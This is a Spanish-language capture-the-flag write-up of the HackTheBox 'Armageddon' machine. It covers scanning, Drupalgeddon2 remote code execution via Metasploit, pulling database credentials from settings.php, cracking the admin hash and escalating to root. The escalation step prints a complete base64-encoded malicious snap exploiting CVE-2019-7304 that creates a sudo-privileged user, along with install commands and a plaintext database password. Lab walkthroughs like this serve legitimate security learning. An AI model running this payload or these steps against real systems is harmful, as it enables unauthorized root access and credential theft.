HackTheBox - Armageddon

Armageddon

• Pasos

1-> Escaneo de la ip con nmap
2-> Identificar tecnologias de la web
3-> Conseguir RCE
4-> Encontrando archivos potenciales
5-> Mostrando tablas de la base de datos
6-> Crackear hash del usuario administrador
7-> Escalando privilegios

---

Escaneo de la ip con nmap

• nmap -sSV –min-rate 3000 –open -n -Pn 10.10.10.214

Agreguemos la IP(10.10.10.214) al /etc/hosts
Ya puestos en el navegador accederemos a armageddon.htb

Identificar tecnologias de la web

Utilizaremos whatweb para identificar que tecnologias usan la web

Vemos que la web trabaja con un drupal version 7.Una version muy desactualizada.

Conseguir RCE

Para conseguir ejecuion remota de comandos acudiremos al exploit drupalgeddon_2 el cual podemos usar de manera automatica mediante metasploit framework

Una vez seteado los parametros rhosts, rport y lhost(ip_HTB) obtendremos un meterpreter

Luego de obtener una terminal de meterpreter nos iremos a una shell.

Encontrando archivos potenciales

En el directorio /var/www/html/sites/default/ encontraremos un archivo de configuracion llamado settings.php.

cat setttings.php

Como observan tenemos usuario, contraseña y el nombre del host.con los cuales podemos acceder a la base de datos.

Mostrando tablas de la base de datos

mysql -u drupaluser -h localhost -pCQHEy@9M*m23gBVj
use drupal;
select * from users;
show;

Obtuvimos el hash de la contraseña del usuario brucetherealadmin

Crackear hash del usuario administrador

Le pasaremos el rockyou.txt

Posteriormente accederemos por ssh

Escalando privilegios

Identificar la version de snap

CVE-2019-7304

Ahora nos creamos un .snap malicioso para luego instalarlo

python2 -c 'print  "aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD//////////xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJhZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERoT2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawplY2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFtZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZvciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5nL2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZtb2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAerFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUjrkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAAAAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAAAFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw" + "A"*4256 + "=="' | base64 -d > root.snap
sudo /usr/bin/snap install --devmode root.snap
su dirty_sock
passwd: dirty_sock

Nota: A veces la instalacion de .snap malicioso tiende a demorarse por lo que seria bueno entrar mediante ssh otra vez y repetir el proceso
Siendo el usuario dirty_sock solo resta:

sudo -s
password: dirty_sock

Y ya somos ROOT

• H@ppY H@(K1NG!